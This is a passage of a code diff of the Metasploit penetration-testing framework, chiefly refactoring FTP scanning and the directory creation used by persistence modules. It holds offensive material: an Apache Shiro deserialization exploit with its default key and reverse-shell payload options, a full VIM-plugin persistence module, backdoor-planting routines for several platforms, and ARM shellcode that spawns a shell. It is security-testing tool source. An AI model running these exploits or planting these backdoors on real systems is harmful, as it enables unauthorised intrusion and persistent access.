+   ----       ---------------           --------  -----------
+   ENC_KEY    kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
+   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80                        yes       The target port (TCP)
+   SSL        false                     no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                         yes       Base directory path
+   VHOST                                no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):

lib/metasploit/framework/version.rb

@@ -32,7 +32,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.4.133"
+      VERSION = "6.4.132"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/core/db_manager/vuln.rb

@@ -101,10 +101,9 @@ module Msf::DBManager::Vuln
   #
   def report_vuln(opts)
     return if not active
-    raise ArgumentError.new("report_vuln Missing required option :host") if opts[:host].nil?
-    raise ArgumentError.new("report_vuln Deprecated data column for vuln, use .info instead") if opts[:data]
-    raise ArgumentError.new("report_vuln Missing required option :name") if opts[:name].nil?
-    name = opts[:name]
+    raise ArgumentError.new("Missing required option :host") if opts[:host].nil?
+    raise ArgumentError.new("Deprecated data column for vuln, use .info instead") if opts[:data]
+    name = opts[:name] || return
     info = opts[:info]
 
   ::ApplicationRecord.connection_pool.with_connection {
@@ -334,7 +333,7 @@ module Msf::DBManager::Vuln
   # @param opts[:ids] [Array] Array containing Integers corresponding to the IDs of the Vuln entries to delete.
   # @return [Array] Array containing the Mdm::Vuln objects that were successfully deleted.
   def delete_vuln(opts)
-    raise ArgumentError.new("delete_vuln The following options are required: :ids") if opts[:ids].nil?
+    raise ArgumentError.new("The following options are required: :ids") if opts[:ids].nil?
 
   ::ApplicationRecord.connection_pool.with_connection {
     deleted = []

lib/msf/core/exploit/remote/ftp.rb

@@ -11,7 +11,6 @@ module Msf
 module Exploit::Remote::Ftp
 
   include Exploit::Remote::Tcp
-  include Msf::Auxiliary::Report
 
   #
   # Creates an instance of an FTP exploit module.
@@ -48,65 +47,22 @@ module Exploit::Remote::Ftp
   # message is read in and stored in the 'banner' attribute.
   #
   def connect(global = true, verbose = nil)
-    verbose = datastore['FTPDEBUG'] || datastore['VERBOSE'] if verbose.nil?
+    verbose ||= datastore['FTPDEBUG']
+    verbose ||= datastore['VERBOSE']
 
-    print_status("Connecting to FTP server...") if verbose
+    print_status("Connecting to FTP server #{rhost}:#{rport}...") if verbose
 
-    begin
-      fd = super(global)
-    rescue ::Rex::ConnectionRefused
-      report_host(host: rhost)
-      raise
-    end
+    fd = super(global)
 
     # Wait for a banner to arrive...
     self.banner = recv_ftp_resp(fd)
 
-    print_status('Connected to target FTP server') if verbose
-
-    # Only record the service and banner when the greeting looks like FTP (RFC 959)
-    if self.banner&.match?(/^(120|220)[\s-]/)
-      # Cleaned up FTP banner
-      report_service(
-        host: rhost,
-        port: rport,
-        proto: 'tcp',
-        name: 'ftp',
-        info: Rex::Text.to_hex_ascii(banner_version),
-        parents: {
-          host: rhost,
-          port: rport,
-          proto: 'tcp',
-          name: 'tcp'
-        }
-      )
-
-      # Raw FTP banner
-      report_note(
-        host: rhost,
-        port: rport,
-        proto: 'tcp',
-        sname: 'ftp',
-        type: 'ftp.banner',
-        data: { banner: Rex::Text.to_hex_ascii(self.banner.strip) }
-      )
-    end
+    print_status("Connected to target FTP server.") if verbose
 
     # Return the file descriptor to the caller
     fd
   end
 
-  # Extracts a normalized version string from the FTP banner
-  # 220 (vsFTPd 2.3.4)\x0d\x0a                                   -> vsFTPd 2.3.4
-  # 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.0.10]\x0d\x0a -> ProFTPD 1.3.1 Server (Debian)
-  def banner_version
-    banner.to_s
-          .sub(/^\d{3}[\s-]/, '')
-          .strip
-          .gsub(/\A\(|\)\z/, '')
-          .gsub(/\s*\[(?:(?:\d{1,3}\.){3}\d{1,3}|[0-9A-Fa-f:]*:[0-9A-Fa-f:.]+)\]/, '')
-  end
-
   #
   # This method handles establishing datasocket for data channel
   #
@@ -177,8 +133,8 @@ module Exploit::Remote::Ftp
   # that have been supplied in the exploit options.
   #
   def connect_login(global = true, verbose = nil)
-    verbose = datastore['FTPDEBUG'] || datastore['VERBOSE'] if verbose.nil?
-
+    verbose ||= datastore['FTPDEBUG']
+    verbose ||= datastore['VERBOSE']
     ftpsock = ftp_connect(global, verbose)
 
     if !(user and pass)
@@ -356,7 +312,7 @@ module Exploit::Remote::Ftp
         if not found_end
           resp << ln
           resp << "\r\n"
-          if ln.length > 3 and ln[3,1] == ' ' and ln[0,3] =~ /\A\d{3}\z/
+          if ln.length > 3 and ln[3,1] == ' '
             found_end = true
           end
         else

lib/msf/core/post/architecture.rb

@@ -4,7 +4,6 @@ module Msf::Post::Architecture
 
   # Get the architecture of the target's operating system.
   # @return [String, Nil] Returns a string containing the target OS architecture if known, or Nil if its not known.
-  #
   def get_os_architecture
     if session.type == 'meterpreter'
       os_architecture = sysinfo['Architecture']
@@ -32,10 +31,7 @@ module Msf::Post::Architecture
           print_error('Target is running Windows on an unsupported architecture!')
           return nil
         end
-      when 'linux', 'bsd', 'osx'
-        uname_m = cmd_exec('uname -m').to_s.strip
-        Rex::Arch.from_uname(uname_m)
       end
     end
   end
-end
+end

lib/msf/util/payload_cached_size.rb

@@ -168,8 +168,8 @@ class PayloadCachedSize
   #
   # @param mod [Msf::Payload] The class of the payload module to update
   # @return [Integer, String]
-  def self.compute_cached_size(framework, mod, generation_count: 10)
-    return ":dynamic" if is_dynamic?(framework, mod, generation_count: generation_count)
+  def self.compute_cached_size(framework, mod)
+    return ":dynamic" if is_dynamic?(framework, mod)
 
     mod.replicant.generate_simple(module_options(mod)).bytesize
   end
@@ -180,7 +180,7 @@ class PayloadCachedSize
   # @param generation_count [Integer] The number of iterations to use to
   #   verify that the size is static.
   # @return [Boolean]
-  def self.is_dynamic?(framework, mod, generation_count: 10)
+  def self.is_dynamic?(framework, mod, generation_count=10)
     return true if mod.class.const_defined?('ForceDynamicCachedSize') && mod.class::ForceDynamicCachedSize
     opts = module_options(mod)
     last_bytesize = nil

lib/rex/user_agent.rb

@@ -9,16 +9,16 @@ module Rex::UserAgent
   # Taken from https://www.whatismybrowser.com/guides/the-latest-user-agent/
   #
   COMMON_AGENTS = [
-    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', # Chrome Windows
-    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36', # Chrome MacOS
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36', # Chrome Windows
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36', # Chrome MacOS
 
-    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86', # Edge Windows
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.0.0 Safari/537.36 Edg/147.0.3912.98', # Edge Windows
 
-    'Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1', # Safari iPad
-    'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15', # Safari MacOS
+    'Mozilla/5.0 (iPad; CPU OS 18_7_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Mobile/15E148 Safari/604.1', # Safari iPad
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15', # Safari MacOS
 
-    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0', # Firefox Windows
-    'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0' # Firefox MacOS
+    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0', # Firefox Windows
+    'Mozilla/5.0 (Macintosh; Intel Mac OS X 15.7; rv:150.0) Gecko/20100101 Firefox/150.0' # Firefox MacOS
   ]
 
   #

modules/auxiliary/scanner/dns/dns_amp.rb

@@ -126,8 +126,7 @@ class MetasploitModule < Msf::Auxiliary
         report_vuln(
           :host => shost,
           :port => datastore['RPORT'],
-          :proto => 'udp',
-          :name => "DNS",
+          :proto => 'udp', :name => "DNS",
           :info => "DNS amplification -  #{data.length} bytes [#{amp.round(2)}x Amplification]",
           :refs => self.references
         )

modules/auxiliary/scanner/ftp/anonymous.rb

@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name' => 'Anonymous FTP Access Detection',
+      'Description' => 'Detect anonymous (read/write) FTP server access.',
+      'References' => [
+        ['URL', 'https://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
+      ],
+      'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
+      'License' => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        Opt::RPORT(21),
+      ]
+    )
+  end
+
+  def run_host(target_host)
+    begin
+      res = connect_login(true, false)
+
+      banner.strip! if banner
+
+      dir = Rex::Text.rand_text_alpha(8)
+      if res
+        write_check = send_cmd(['MKD', dir], true)
+
+        if write_check && write_check =~ /^2/
+          send_cmd(['RMD', dir], true)
+
+          print_good("#{target_host}:#{rport} - Anonymous READ/WRITE (#{banner})")
+          access_type = 'Read/Write'
+        else
+          print_good("#{target_host}:#{rport} - Anonymous READ (#{banner})")
+          access_type = 'Read-only'
+        end
+        register_creds(target_host, access_type)
+      elsif banner
+        report_service(
+          host: rhost,
+          port: rport,
+          proto: 'tcp',
+          name: 'ftp',
+          info: banner
+        )
+      end
+
+      disconnect
+    rescue ::Interrupt
+      raise $ERROR_INFO
+    rescue ::Rex::ConnectionError, ::IOError
+    end
+  end
+
+  def register_creds(target_host, access_type)
+    # Build service information
+    service_data = {
+      address: target_host,
+      port: datastore['RPORT'],
+      service_name: 'ftp',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    # Build credential information
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      private_data: datastore['FTPPASS'],
+      private_type: :password,
+      username: datastore['FTPUSER'],
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      access_level: access_type,
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+end

modules/auxiliary/scanner/ftp/ftp_anonymous.rb

@@ -1,134 +0,0 @@
-# frozen_string_literal: true
-
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Auxiliary
-  include Msf::Exploit::Remote::Ftp
-  include Msf::Auxiliary::Scanner
-  include Msf::Module::Deprecated
-  moved_from 'auxiliary/scanner/ftp/anonymous'
-
-  def initialize
-    super(
-      'Name' => 'Anonymous FTP Access Detection',
-      'Description' => 'Detect anonymous (read/write) FTP service access.',
-      'References' => [
-        ['URL', 'https://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP'],
-        ['CVE', '1999-0497'],
-      ],
-      'Author' => [
-        'Matteo Cantoni <goony[at]nothink.org>',
-        'g0tmi1k' # @g0tmi1k - additional features
-      ],
-      'License' => MSF_LICENSE,
-      'Notes' => {
-        'Stability' => [CRASH_SAFE],
-        'SideEffects' => [IOC_IN_LOGS],
-        'Reliability' => []
-      }
-    )
-
-    register_options(
-      [
-        Opt::RPORT(21),
-        OptBool.new('STORE_LOOT', [false, 'Store the directory listing as loot', true])
-      ]
-    )
-  end
-
-  def run_host(target_host)
-    res = connect_login(true, false)
-
-    if res
-      dir = Rex::Text.rand_text_alpha(8)
-      vprint_status("Testing write access, creating test directory: #{dir}")
-      # Alt would be to use STOR
-      write_check = send_cmd(['MKD', dir], true)
-
-      if write_check && write_check =~ /^2/
-        access_type = 'Read/Write'
-        vprint_status("Removing test directory: #{dir}")
-        send_cmd(['RMD', dir], true)
-      else
-        access_type = 'Read-only'
-      end
-
-      print_good("Anonymous #{access_type} access (#{@banner_version})")
-
-      if datastore['STORE_LOOT']
-        vprint_status('Listing directory contents')
-        listing = send_cmd_data(['LS'], nil)
-        if listing.nil?
-          print_warning('Could not retrieve directory listing (data connection failed)')
-        elsif listing[1].nil? || listing[1].empty?
-          vprint_status('Directory listing: (empty)')
-        else
-          vprint_status("Directory listing:\n#{listing[1]}")
-          path = store_loot('ftp.anonymous', 'text/plain', rhost, listing[1], 'ftp_anonymous.txt', 'Anonymous FTP directory listing')
-          print_good("Directory listing stored to: #{path}")
-        end
-      end
-
-      report_vuln(
-        host: rhost,
-        port: rport,
-        proto: 'tcp',
-        sname: 'ftp',
-        name: 'Anonymous FTP Access',
-        info: "Anonymous FTP login accepted with #{access_type} access",
-        refs: references
-      )
-      register_creds(target_host, access_type)
-    elsif banner
-      print_warning("FTP service, but no anonymous access (#{banner_version})")
-    else
-      vprint_warning('No FTP banner received')
-    end
-  rescue ::Rex::TimeoutError, ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNREFUSED => e
-    vprint_error(e.message)
-    report_host(host: rhost)
-  rescue ::Interrupt
-    raise $ERROR_INFO
-  ensure
-    disconnect
-  end
-
-  def register_creds(target_host, access_type)
-    # Build service information
-    service_data = {
-      address: target_host,
-      port: rport,
-      service_name: 'ftp',
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
-    # Build credential information
-    credential_data = {
-      origin_type: :service,
-      module_fullname: fullname,
-      private_data: datastore['FTPPASS'],
-      private_type: :password,
-      username: datastore['FTPUSER'],
-      workspace_id: myworkspace_id
-    }
-
-    credential_data.merge!(service_data)
-    credential_core = create_credential(credential_data)
-
-    # Assemble the options hash for creating the Metasploit::Credential::Login object
-    login_data = {
-      access_level: access_type,
-      core: credential_core,
-      last_attempted_at: DateTime.now,
-      status: Metasploit::Model::Login::Status::SUCCESSFUL,
-      workspace_id: myworkspace_id
-    }
-
-    login_data.merge!(service_data)
-    create_credential_login(login_data)
-  end
-end

modules/auxiliary/scanner/http/trace.rb

@@ -46,8 +46,6 @@ class MetasploitModule < Msf::Auxiliary
           :port => rport,
           :proto => 'tcp',
           :sname => (ssl ? 'https' : 'http'),
-          :name => 'HTTP TRACE Method Enabled (Cross-Site Tracing)',
-          :refs => references,
           :info => "Vulnerable to Cross-Site Tracing"
         )
       else

modules/exploits/linux/http/projectsend_unauth_rce.rb

@@ -217,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => params
     })
 
-    fail_with(Failure::Unknown, 'Could not create a new user') if res.nil? || res.code == 403
+    fail_with(Failure::Unknown, 'Could not create a new user') unless res&.code != 403
     print_good("User #{username} created with password #{password}")
   end
 

modules/exploits/linux/local/cve_2026_31431_copy_fail.rb

@@ -48,9 +48,8 @@ class MetasploitModule < Msf::Exploit::Local
               'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               # Space is constrained due to the max size of the resulting ELF executable (2024 on 6.8.0-79-generic
-              # x86_64, 2036 on 6.6.63-v8+ aarch64, 2028 on 5.15.44-Re4son-v7+ armv7l) if Metasploit changes the ELF
-              # executable size in the future, this may need to be updated. The Space here is the largest size that
-              # yeilds an ELF executable that fits all tested architectures.
+              # x86_64, 2036 on 6.6.63-v8+ aarch64) if Metasploit changes the ELF executable size in the future, this
+              # may need to be updated
               'Payload' => { 'Space' => 1847, 'DisableNops' => true }
             }
           ]
@@ -129,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Local
   def run_command(os_command)
     os_architecture = get_os_architecture
 
-    unless [ ARCH_X64, ARCH_AARCH64, ARCH_ARMLE ].include?(os_architecture)
+    unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)
       # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.
       fail_with(Failure::NoTarget, "#{os_architecture} targets are not supported.")
     end

modules/exploits/linux/persistence/autostart.rb

@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
     user = target_user
     home = get_home_dir(user)
     vprint_status('Making sure the autostart directory exists')
-    mkdir("#{home}/.config/autostart", cleanup: false) # in case no autostart exists
+    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
 
     name = datastore['BACKDOOR_NAME'] || Rex::Text.rand_text_alpha(5..8)
     path = "#{home}/.config/autostart/#{name}.desktop"

modules/exploits/linux/persistence/emacs_extension.rb

@@ -83,13 +83,13 @@ class MetasploitModule < Msf::Exploit::Local
       @clean_up_rc << "upload #{path} #{config_file}\n"
     else
       print_status("#{config_file} does not exist, creating it")
-      mkdir(emacs_dir, cleanup: false) unless directory?(emacs_dir)
+      cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish
       write_file(config_file, '')
       @clean_up_rc << "rm #{config_file}\n"
     end
 
     unless directory?(lisp_dir)
-      mkdir(lisp_dir, cleanup: false)
+      cmd_exec("mkdir #{lisp_dir}")
       @clean_up_rc << "rmdir #{lisp_dir}\n"
     end
 

modules/exploits/linux/persistence/init_systemd.rb

@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Local
     user = target_user
     home = get_home_dir(user)
     vprint_status('Creating user service directory')
-    mkdir("#{home}/.config/systemd/user", cleanup: false)
+    cmd_exec("mkdir -p #{home}/.config/systemd/user")
 
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
     vprint_status("Writing service: #{service_name}")
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
     if !file_exist?(service_name)
       print_error('File not written, check permissions. Attempting secondary location')
       vprint_status('Creating user secondary service directory')
-      mkdir("#{home}/.local/share/systemd/user", cleanup: false)
+      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
 
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")

modules/exploits/linux/persistence/vim_plugin.rb

@@ -1,81 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
-
-  include Msf::Post::File
-  include Msf::Exploit::Local::Persistence
-  prepend Msf::Exploit::Remote::AutoCheck
-
-  def initialize(info = {})
-    super(
-      update_info(
-        info,
-        'Name' => 'VIM Plugin Persistence',
-        'Description' => %q{
-          This module creates a VIM Plugin which executes a payload on VIM startup.
-        },
-        'License' => MSF_LICENSE,
-        'Author' => [
-          'h00die',
-        ],
-        'Platform' => [ 'linux' ],
-        'Arch' => [ ARCH_CMD ],
-        'SessionTypes' => [ 'meterpreter', 'shell' ],
-        'Targets' => [[ 'Auto', {} ]],
-        'References' => [
-          [ 'URL', 'https://vimways.org/2019/writing-vim-plugin/'],
-          [ 'URL', 'https://www.linode.com/docs/guides/writing-a-vim-plugin/'],
-          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
-        ],
-        'DisclosureDate' => '1991-11-03', # VIM release date
-        'DefaultTarget' => 0,
-        'Notes' => {
-          'Stability' => [CRASH_SAFE],
-          'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
-        }
-      )
-    )
-    register_advanced_options [
-      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random'])
-    ]
-  end
-
-  def check
-    return CheckCode::Safe('VIM is required') unless command_exists?('vim')
-
-    CheckCode::Detected('VIM is installed')
-  end
-
-  def plugin_name
-    return datastore['NAME'] unless datastore['NAME'].empty?
-
-    Rex::Text.rand_text_alpha(5..10)
-  end
-
-  def get_home
-    return cmd_exec('echo ~').strip
-  end
-
-  def install_persistence
-    plugin = plugin_name
-    vim_plugin = File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'vim_plugin', 'plugin.vim'
-    ))
-    vim_plugin = vim_plugin.gsub('PAYLOAD_PLACEHOLDER', payload.encoded.gsub(';./', ';nohup ./')) # already run async
-    vim_plugin = vim_plugin.gsub('NAME', plugin)
-
-    path = "#{get_home}/.vim/plugin"
-    mkdir(path, cleanup: false) unless directory?(path)
-    path = "#{path}/#{plugin}.vim"
-    vprint_status("Writing plugin to #{path}")
-    unless write_file(path, vim_plugin)
-      fail_with(Failure::UnexpectedReply, "Failed to write VIM plugin to #{path}")
-    end
-    @clean_up_rc = "rm #{path}\n"
-  end
-end

modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb

@@ -20,8 +20,6 @@ class MetasploitModule < Msf::Exploit::Remote
           installations of Apache Shiro v1.2.4. Note that other versions of Apache Shiro may
           also be exploitable if the encryption key used by Shiro to encrypt rememberMe
           cookies is known.
-
-          The gadget chain used for Java deserialization must be present on the target's classpath.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -64,11 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'Base directory path', '/']),
-        OptString.new('ENC_KEY', [ true, 'Shiro encryption key', 'kPH+bIxk5D2deZiIxcaaaA==']),
-        OptEnum.new('JAVA_GADGET_CHAIN', [
-          true, 'The Java gadget chain to use for deserialization', 'CommonsCollections2',
-          Msf::Exploit::JavaDeserialization.gadget_chains
-        ])
+        OptString.new('ENC_KEY', [ true, 'Shiro encryption key', 'kPH+bIxk5D2deZiIxcaaaA=='])
       ]
     )
   end
@@ -81,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    java_payload = generate_java_deserialization_for_payload(datastore['JAVA_GADGET_CHAIN'], payload)
+    java_payload = generate_java_deserialization_for_payload('CommonsCollections2', payload)
     ciphertext = aes_encrypt(java_payload)
     base64_ciphertext = Rex::Text.encode_base64(ciphertext)
 

modules/exploits/multi/persistence/obsidian_plugin.rb

@@ -220,10 +220,12 @@ var ExamplePlugin = class extends import_obsidian.Plugin {
     fail_with(Failure::NotFound, 'No vaults found') if vaults.empty?
     vaults.each_value do |vault|
       print_status("Uploading plugin to vault #{vault['path']}")
+      # avoid mkdir function because that registers it for delete, and we don't want that for
+      # persistent modules
       if ['windows', 'win'].include? session.platform
-        mkdir("#{vault['path']}\\.obsidian\\plugins\\#{plugin}", cleanup: false)
+        cmd_exec("cmd.exe /c md \"#{vault['path']}\\.obsidian\\plugins\\#{plugin}\"")
       else
-        mkdir("#{vault['path']}/.obsidian/plugins/#{plugin}", cleanup: false)
+        cmd_exec("mkdir -p '#{vault['path']}/.obsidian/plugins/#{plugin}/'")
       end
       vprint_status("Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/main.js")
       write_file("#{vault['path']}/.obsidian/plugins/#{plugin}/main.js", main_js(plugin))

modules/exploits/multi/persistence/python_site_specific_hook.rb

@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Detected Python version #{@python_version}")
     get_hooks_path unless @hooks_path
 
-    mkdir(@hooks_path, cleanup: false) if session.platform == 'osx' || session.platform == 'linux'
+    mkdir(@hooks_path) if session.platform == 'osx' || session.platform == 'linux'
 
     fail_with(Failure::NotFound, "The hooks path #{@hooks_path} does not exists") unless directory?(@hooks_path)
     # check if hooks path writable

modules/exploits/osx/persistence/launch_plist.rb

@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
   # drops a LaunchAgent plist into the user's Library, which specifies to run backdoor_path
   def add_launchctl_item
     label = File.basename(backdoor_path)
-    mkdir(File.dirname(plist_path).shellescape, cleanup: false) unless directory?(File.dirname(plist_path))
+    cmd_exec("mkdir -p #{File.dirname(plist_path).shellescape}")
     # NOTE: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
     item = <<-EOF
     <?xml version="1.0" encoding="UTF-8"?>
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Local
   # @param [String] exe the executable to drop
   def write_backdoor(exe)
     print_status('Dropping backdoor executable...')
-    mkdir(File.dirname(backdoor_path).shellescape, cleanup: false) unless directory?(File.dirname(backdoor_path))
+    cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
 
     if write_file(backdoor_path, exe)
       print_good("Backdoor stored to #{backdoor_path}")

modules/exploits/windows/persistence/notepadpp_plugin.rb

@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless session.fs.dir.mkdir(payload_pathname)
     else
-      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless mkdir(payload_pathname, cleanup: false)
+      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless cmd_exec("mkdir \"#{payload_pathname}\"")
     end
 
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)

modules/exploits/windows/persistence/powershell_profile.rb

@@ -85,8 +85,9 @@ class MetasploitModule < Msf::Exploit::Local
         print_status("#{profile_file} does not exist, creating it...")
         folders = profile_file.split('\\')[0..-2]
         folders = folders.join('\\')
+        # we can't use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups
         unless directory?(folders)
-          mkdir(folders, cleanup: false)
+          cmd_exec("cmd /c \"md #{folders}\"")
           @clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
         end
         unless write_file(profile_file, '') # write empty file so we can append later

modules/payloads/singles/linux/armle/exec.rb

@@ -3,8 +3,16 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+###
+#
+# Exec
+# ----
+#
+# Executes an arbitrary command.
+#
+###
 module MetasploitModule
-  CachedSize = 72
+  CachedSize = 29
 
   include Msf::Payload::Single
   include Msf::Payload::Linux::Armle::Prepends
@@ -14,60 +22,25 @@ module MetasploitModule
       merge_info(
         info,
         'Name' => 'Linux Execute Command',
-        'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
-        'Author' => [
-          'Jonathan Salwan',
-          'Spencer McIntyre'
-        ],
+        'Description' => 'Execute an arbitrary command',
+        'Author' => 'Jonathan Salwan',
         'License' => MSF_LICENSE,
         'Platform' => 'linux',
         'Arch' => ARCH_ARMLE
       )
     )
 
-    register_options([
-      OptString.new('CMD', [ false, 'The command string to execute' ]),
-    ])
+    register_options(
+      [
+        OptString.new('CMD', [ true, 'The command string to execute' ]),
+      ]
+    )
   end
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
 
-    if cmd.empty?
-      # execve("/bin/sh", NULL, NULL)
-      shellcode = [
-        0xe28f000c, # add r0, pc, #12
-        0xe3a01000, # mov r1, #0
-        0xe3a02000, # mov r2, #0
-        0xe3a0700b, # mov r7, #11   # __NR_execve
-        0xef000000  # svc 0
-      ].pack('V*')
-      shellcode += "/bin/sh\x00"
-    else
-      # execve("/bin/sh", ["/bin/sh", "-c", CMD, NULL], NULL)
-      shellcode = [
-        0xe0244004, # eor r4, r4, r4
-        0xe92d0010, # push {r4}              ; argv[3] = NULL
-        0xe28f4030, # add r4, pc, #48        ; r4 = &cmd
-        0xe92d0010, # push {r4}              ; argv[2] = &cmd
-        0xe28f4024, # add r4, pc, #36        ; r4 = &"-c"
-        0xe92d0010, # push {r4}              ; argv[1] = &"-c"
-        0xe28f4014, # add r4, pc, #20        ; r4 = &"/bin/sh"
-        0xe92d0010, # push {r4}              ; argv[0] = &"/bin/sh"
-        0xe1a0100d, # mov r1, sp
-        0xe28f0008, # add r0, pc, #8         ; r0 = &"/bin/sh"
-        0xe3a02000, # mov r2, #0
-        0xe3a0700b, # mov r7, #11            ; __NR_execve
-        0xef000000  # svc 0
-      ].pack('V*')
-      shellcode += "/bin/sh\x00"
-      shellcode += "-c\x00\x00"
-      shellcode += cmd + "\x00"
-    end
-
-    # align our shellcode to 4 bytes
-    shellcode += "\x00" while shellcode.bytesize % 4 != 0
-
-    super.to_s + shellcode
+    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30" \
+      "\x01\x90\x01\xa9\x92\x1a\x0b\x27\x01\xdf" + cmd
   end
 end

modules/payloads/singles/linux/x64/exec.rb

@@ -39,7 +39,6 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
-    cmd_length = cmd.bytesize
     nullfreeversion = datastore['NullFreeVersion']
 
     if cmd.empty?
@@ -94,22 +93,19 @@ module MetasploitModule
       pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)
 
       if nullfreeversion
-        if cmd_length > 0xffff
+        if cmd.length > 0xffff
